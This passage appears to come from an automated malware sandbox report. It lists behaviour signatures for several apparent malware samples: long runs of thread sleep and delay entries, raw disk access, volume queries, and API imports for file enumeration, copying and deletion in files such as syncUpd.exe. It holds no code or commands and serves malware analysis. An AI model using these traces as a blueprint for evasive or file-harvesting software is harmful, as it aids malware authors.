                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -558734s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -557781s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -556687s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -555359s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -554500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -553687s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -550154s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -549123s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -548388s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -547285s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -546625s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -545943s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -544442s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -543574s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -542777s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -541993s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -540668s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -540261s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -539466s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -538740s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -538374s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -537952s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -537716s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -537483s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -537249s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -536944s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -536694s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -536376s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -536049s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -535747s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -535508s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -535314s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -535010s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -534399s >= -30000s
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe TID: 796Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe TID: 32316Thread sleep count: 34 > 30
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe TID: 32316Thread sleep time: -2040000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00452A60 FindFirstFileA,GetLastError,14_2_00452A60
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,14_2_00474F88
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,14_2_004980A4
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,14_2_00464158
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00462750 FindFirstFileA,FindNextFileA,FindClose,14_2_00462750
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,14_2_00463CDC
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_00408123 FindFirstFileA,FindClose,15_2_00408123
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,15_2_004085B8
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_0040342B FindFirstFileA,15_2_0040342B
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_0040D1C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_004015C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,17_2_00411650
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,17_2_0040B610
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,17_2_0040DB60
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0040D540
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_00412570
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,17_2_004121F0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,17_2_00411B80
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: 12_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,12_2_00409B78
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99859Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99750Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99625Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99448Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99326Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99212Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99109Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98984Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98858Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98744Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98636Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98527Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98421Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98312Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98159Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98032Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97921Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97806Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 300000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599822
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599671
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599368
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599031
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598788
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598667
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598561
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598417
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598276
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598136
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597649
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597527
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597379
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596941
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596592
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596447
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596191
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595691
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595571
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595412
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594907
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594368
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594191
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593858
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592816
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592633
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592169
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591953
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590109
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589858
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589672
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 588734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 588468
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 587531
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585843
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584684
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584373
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584181
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583788
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583093
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581828
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581234
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580962
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580777
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580553
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580078
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579764
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579608
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579418
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579047
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578062
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577218
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 576718
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 576203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 575797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 575390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 574890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 573625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 572984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 572172
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 571250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 569531
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 567953
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 567406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 566984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 566156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 565328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 564625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 563703
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 562890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 561922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 561281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 560609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 559609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 558734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 557781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 556687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 555359
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 554500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 553687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 550154
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 549123
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 548388
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 547285
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 546625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 545943
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 544442
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 543574
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 542777
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 541993
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 540668
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 540261
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 539466
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 538740
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 538374
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537716
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537483
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537249
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536944
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536694
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536376
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536049
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535747
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535508
